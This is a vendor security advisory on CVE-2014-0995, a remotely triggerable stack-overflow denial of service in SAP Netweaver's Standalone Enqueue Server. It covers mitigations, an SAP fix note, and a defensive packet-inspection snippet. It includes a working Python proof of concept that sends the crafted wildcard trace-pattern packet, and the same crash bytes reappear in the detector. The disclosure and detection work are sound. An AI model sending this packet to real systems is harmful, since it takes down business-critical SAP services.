**CVSS2:** 5 Medium (AV:N/AC:L/Au:N/C:N/I:N/A:P): Attack Vector NETWORK, Attack Complexity LOW, Authentication NONE, Confidentiality Impact NONE, Integrity Impact NONE, Availability Impact PARTIAL
**EPSS:** 0.041 Low (Percentile 92.1%)
**Title:** SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
**Advisory ID:** CORE-2014-0007
**Advisory URL:** https://www.coresecurity.com/core-labs/advisories/sap-netweaver-enqueue-server-trace-pattern-denial-service-vulnerability
**Date published:** 2014-10-15
**Date of last update:** 2014-10-15
**Vendors contacted:** SAP
**Release mode:** Coordinated release
**Class:** Uncontrolled Recursion [CWE-674]
**Impact:** Denial of service
**Remotely Exploitable:** Yes
**Locally Exploitable:** No
**CVE Name:** CVE-2014-0995
SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. A vulnerability has been found in SAP Netweaver that could allow an unauthenticated, remote attacker to create denial of service conditions. The vulnerability is triggered by sending a specially crafted SAP Enqueue Server packet to remote TCP port 32NN (NN being the SAP system number) of a host running the "Standalone Enqueue Server" service, part of SAP Netweaver Application Server ABAP/Java. The "Standalone Enqueue Server" is a critical component of a SAP Netweaver installation in terms of availability, so making it unavailable renders the whole SAP system unresponsive.
Martin Gallo proposed the following actions to mitigate the impact of the vulnerability: restrict access to the Standalone Enqueue service by configuring Access Control Lists [4], and restrict access to the Standalone Enqueue Service TCP port 32XX (XX is the instance number).
SAP published a security note [3] with the fix.
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Advisories Team.
When the trace level of the service is configured to stop logging when a pattern is found [2], the service does not properly control the amount of recursion, resulting in a stack overflow exception. The vulnerability can be triggered remotely by setting the trace level with a wildcard Trace Pattern. This vulnerability could allow a remote, unauthenticated attacker to conduct a denial of service attack against vulnerable systems, rendering the Enqueue Server unavailable. The following Python code can be used to trigger the vulnerability:
```python
import socket, struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost")
parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200)
(options, args) = parser.parse_args()

def send_packet(sock, packet):
    packet = struct.pack("!I", len(packet)) + packet
    sock.send(packet)

# Connect
print "[*] Connecting to", options.hostname, "port", options.port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((options.hostname, options.port))

print "[*] Sending crash packet"
crash = '\xab\xcd\xe1\x23'                        # Magic bytes
crash += '\x00\x00\x00\x00'                       # Id
crash += '\x00\x00\x00\x5b\x00\x00\x00\x5b'       # Packet/frag length
crash += '\x03\x00\x00\x00'                       # Destination/Opcode/MoreFrags/Type
crash += 'ENC\x00'                                # Admin Eye-catcher
crash += '\x01\x00\x00\x00'                       # Version
crash += '#EAA'                                   # Admin Eye-catcher
crash += '\x01\x00\x00\x00\x00'                   # Len
crash += '\x06\x00\x00\x00\x00\x00'               # Opcode/Flags/RC
crash += '#EAE'                                   # Admin Eye-catcher
crash += '\x01\x04\x00\x00'                       # Version/Action/Limit/Thread
crash += '\x00\x00\x00\x00'
crash += '\x00\x00\x00\x03\x00\x00\x00\x03'       # Trace Level
crash += '\x01'                                   # Logging
crash += '\x01\x40\x00\x00'                       # Max file size
crash += '\x00\x00\x00\x01\x00\x00\x00\x01'       # No. patterns
crash += '\x00\x00\x00\x25#EAH'                   # Trace Eye-catcher
crash += '\x01*\x00'                              # Trace Pattern
crash += '#EAD'                                   # Trace Eye-catcher

send_packet(connection, crash)
print "[*] Crash sent !"
```
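For defenders, the same packet layout can drive a network detection rule. The following is an added example, not code from the advisory or from SAP: it parses the framing and eye-catchers documented in the PoC's comments and flags a trace-set request whose pattern contains a wildcard. The field offsets, the single flag byte assumed before the pattern text, and the benign sample packet are assumptions made for this example.

```python
import struct

# Field constants read off the advisory PoC's packet comments (not an SAP spec).
MAGIC = b"\xab\xcd\xe1\x23"
ADMIN_EYECATCHER = b"ENC\x00"
TRACE_HDR, TRACE_END = b"#EAH", b"#EAD"

# Sample inputs: the advisory's wildcard ("*") trace-pattern packet, and a constructed
# benign variant that differs only in the pattern byte so every length field stays valid.
CRASH_PACKET = (
    MAGIC + b"\x00\x00\x00\x00" + b"\x00\x00\x00\x5b\x00\x00\x00\x5b" + b"\x03\x00\x00\x00"
    + ADMIN_EYECATCHER + b"\x01\x00\x00\x00" + b"#EAA" + b"\x01\x00\x00\x00\x00"
    + b"\x06\x00\x00\x00\x00\x00" + b"#EAE" + b"\x01\x04\x00\x00" + b"\x00\x00\x00\x00"
    + b"\x00\x00\x00\x03\x00\x00\x00\x03" + b"\x01" + b"\x01\x40\x00\x00"
    + b"\x00\x00\x00\x01\x00\x00\x00\x01" + b"\x00\x00\x00\x25"
    + TRACE_HDR + b"\x01*\x00" + TRACE_END
)
BENIGN_PACKET = CRASH_PACKET.replace(b"\x01*\x00", b"\x01E\x00")

def frame(payload):
    """Prefix a payload with the 4-byte big-endian length used on the wire."""
    return struct.pack("!I", len(payload)) + payload

def trace_patterns(payload):
    """Return the trace patterns in an Enqueue admin (ENC) packet, or [] if none.
    A pattern block is assumed to be '#EAH', one flag byte, text, NUL, '#EAD'."""
    if not payload.startswith(MAGIC) or ADMIN_EYECATCHER not in payload[:32]:
        return []
    patterns, pos = [], 0
    while True:
        start = payload.find(TRACE_HDR, pos)
        end = payload.find(TRACE_END, start) if start >= 0 else -1
        if end < 0:
            return patterns
        body = payload[start + len(TRACE_HDR) + 1:end]
        patterns.append(body.split(b"\x00", 1)[0])
        pos = end + len(TRACE_END)

def inspect_frame(frame_bytes):
    """Classify one length-prefixed frame sent to TCP 32NN for a sensor or SIEM rule."""
    if len(frame_bytes) < 4:
        return "short"
    (length,) = struct.unpack("!I", frame_bytes[:4])
    pats = trace_patterns(frame_bytes[4:4 + length])
    if not pats:
        return "not-trace-admin"
    if any(b"*" in p for p in pats):
        return "alert: wildcard trace pattern (CVE-2014-0995)"
    return "trace-admin"
```

A sensor that reassembles TCP to port 32NN can feed each length-prefixed frame to `inspect_frame` and alert on the wildcard result; the rule only inspects, it never sends anything.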
[1] <http://www.sap.com/platform/netweaver/index.epx>.
[2] <http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/e929ca3d7001cee10000000a421937/content.htm?frameset=/en/47/ea3ef600e83b8be10000000a421937/frameset.htm>.
[3] SAP security note 2042845.
[4] <https://websmp230.sap-ag.de/sap/support/notes/1495075>.
CoreLabs, the research center of Core Security, A Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team comprises seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2014 Core Security and © 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security advisories team.